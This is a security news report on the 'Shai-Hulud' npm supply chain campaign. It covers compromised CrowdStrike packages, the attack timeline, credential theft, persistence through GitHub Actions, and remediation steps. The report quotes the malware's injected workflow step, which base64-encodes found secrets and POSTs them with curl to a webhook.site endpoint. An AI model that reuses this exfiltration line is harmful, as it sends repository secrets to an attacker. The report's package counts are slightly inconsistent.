Shai-Hulud Attack Escalates: CrowdStrike NPM Packages Compromised

A sophisticated supply chain attack dubbed "Shai-Hulud" has now compromised over 700 npm packages, including multiple official CrowdStrike packages, as attackers demonstrate unprecedented persistence in targeting the JavaScript ecosystem with credential-stealing malware.

The campaign, which began on September 14, 2025, represents the third major npm compromise in recent months, following the crypto-wallet targeting attack that hit 2 billion weekly downloads in early September and the Nx CLI incident in August 2025. Security researchers report the attack is actively expanding, with new compromised packages discovered daily.

CrowdStrike Packages Directly Targeted

In a particularly concerning development, attackers compromised multiple official CrowdStrike npm packages published by the crowdstrike-publisher account on September 16, marking the first time the cybersecurity giant's development tools have been targeted in a supply chain attack.

Affected CrowdStrike packages include:

• @crowdstrike/foundry-js - JavaScript SDK for CrowdStrike's development platform
• @crowdstrike/logscale-dashboard - Dashboard components for log analysis
• @crowdstrike/falcon-shoelace - UI component library
• @crowdstrike/tailwind-toucan-base - Tailwind CSS framework extensions

"Multiple CrowdStrike npm packages published by the crowdstrike-publisher npm account were compromised," Socket Security confirmed. "This looks like a continuation of the ongoing malicious supply chain campaign."

The targeting of a major cybersecurity company's development tools represents a significant escalation, potentially giving attackers access to systems used by CrowdStrike customers and partners.

Security firm Socket Research Team identified the initial malicious activity, with JFrog's malware scanners later detecting compromised packages across hundreds of versions. The attack continues to expand, with researchers tracking new compromised packages daily across multiple hash variants of the malware payload.

Coordinated Multi-Day Campaign With Distinct Attack Waves

Technical analysis reveals the Shai-Hulud campaign operates through carefully orchestrated attack waves, with researchers tracking distinct malware variants by their SHA-256 hashes across a three-day assault:

September 14, 2025:

• 17:58 UTC: Initial compromise detected with packages like rxnt-authentication and json-rules-engine-simplified
• 20:29-20:45 UTC: First major burst targeting 25+ packages
• 21:01-21:03 UTC: Secondary wave compromising ~17 packages

September 15, 2025:

• Multiple coordinated bursts throughout the day, with over 100 packages compromised
• Attackers deployed at least 4 distinct malware hash variants, suggesting sophisticated payload management

September 16, 2025:

• 01:14 UTC: Largest single burst targeting nearly 100 packages, including the CrowdStrike compromise
• Continued expansion with additional waves affecting @operato and other package families

"The attack surface is growing and we will continue updating this list," Socket Security warned, indicating the campaign remains active.

Credential Harvesting: The malware bundles TruffleHog, a legitimate open-source secret scanner, to systematically search infected systems for:

• GitHub personal access tokens
• NPM publishing tokens
• AWS access keys and secrets
• Google Cloud Platform credentials
• Azure credentials (in later variants)

System Profiling: The malware gathers comprehensive system information, including platform details, environment variables, and runtime configurations, to optimize its attack strategy.

Data Exfiltration: Stolen credentials are transmitted through multiple channels:

• Direct uploads to hardcoded webhook endpoints
• Creation of private GitHub repositories named "Shai-Hulud" containing base64-encoded stolen data
• Injection of GitHub Actions workflows that persist beyond initial infection

Persistent CI/CD Compromise

Perhaps most concerning is the malware's ability to establish persistent access to development environments. The payload writes malicious GitHub Actions workflows into repositories that continue executing during future CI/CD runs.

"The workflow that it writes to repositories persists beyond the initial host," security researchers warned. "Once committed, any future CI run can trigger the exfiltration step from within the pipeline where sensitive secrets and artifacts are available by design."

The injected workflow contains code that posts all repository secrets to attacker-controlled endpoints:

run: |
  CONTENTS="$(cat findings.json | base64 -w0)"
  curl -s -X POST -d "$CONTENTS" "https://webhook.site/bb8ca5f6-4175-45d2-b042-fc9ebb8170b7"

Massive Scope of Compromise

The attack has compromised packages across numerous high-profile organizations:

CrowdStrike packages including:

• @crowdstrike/foundry-js - JavaScript SDK platform
• @crowdstrike/logscale-dashboard - Log analysis dashboard
• @crowdstrike/falcon-shoelace - UI component library

Popular development ecosystems:

• NativeScript packages: @nativescript-community/sqlite, @nativescript-community/ui-material-core
• Angular/React tools: angulartics2, ngx-bootstrap, react-jsonschema-form-extras
• Development utilities: ember-browser-services, eslint-config-crowdstrike

The targeting of CrowdStrike's official packages represents a particularly bold escalation, potentially exposing systems used by the cybersecurity giant's enterprise customers.

Supply Chain Attack Evolution

The Shai-Hulud campaign represents a significant evolution in npm supply chain attacks, building on techniques seen in previous incidents:

• Scale: Over 500 packages compromised versus 40+ in the tinycolor incident
• Persistence: GitHub Actions workflows provide long-term access beyond initial infection
• Sophistication: Integration of legitimate tools like TruffleHog for credential scanning
• Multi-platform targeting: Support for AWS, GCP, Azure, GitHub, and npm ecosystems

"The use of GitHub repositories to store stolen data mirrors techniques seen in the previous NX CLI compromise," jforg researchers noted, though attribution between campaigns remains uncertain.

Immediate Protection Measures

For Development Teams:

• Audit infected environments: Check CI/CD systems and developer machines that installed affected packages for unauthorized publishes or credential theft
• Rotate all tokens: Immediately rotate npm tokens, GitHub PATs, AWS keys, and other exposed secrets
• Review package locks: Examine package-lock.json changes with the same scrutiny as application code
• Pin dependencies: Use npm's overrides feature to pin vulnerable packages to known-good versions
• Monitor for persistence: Check repositories for unauthorized GitHub Actions workflows, especially those named "shai-hulud-workflow.yml"

For Individual Developers:

• Scan local development environments for signs of compromise
• Review recent GitHub repository activity for unauthorized commits or Actions workflows
• Enable two-factor authentication on all development accounts
• Use npm ci instead of npm install in automated environments

Industry-Wide Implications

The rapid succession of major npm attacks—cryptocurrency theft in September, Shai-Hulud in mid-September, and the earlier Nx compromise—signals a fundamental crisis in open-source supply chain security.

"The open-source ecosystem runs on trust, but it's crucial to be vigilant," security experts warn. "Organizations must now balance the convenience of open-source dependencies with the reality that any package update could potentially introduce malicious code."

The attacks highlight critical vulnerabilities in the npm ecosystem:

• Single points of failure through the maintainer account compromise
• Lack of mandatory two-factor authentication
• Insufficient monitoring of package changes
• Weak verification mechanisms for package updates

Ongoing Investigation

Security researchers continue tracking the expanding compromise as new malicious packages are discovered. The attack's use of legitimate tools and sophisticated persistence mechanisms suggests well-resourced attackers with a deep understanding of developer workflows.

NPM has begun removing malicious package versions, though some packages remained compromised at the time of reporting. The full scope of data theft and compromised systems may not be known for weeks as organizations audit their development environments.

The Shai-Hulud campaign serves as a stark reminder that the JavaScript ecosystem's vast dependency network, while enabling rapid development, also creates unprecedented attack surfaces that threat actors are increasingly exploiting at scale.

This is a developing story. Organizations should immediately audit their development environments and rotate credentials if any listed packages were installed in their infrastructure.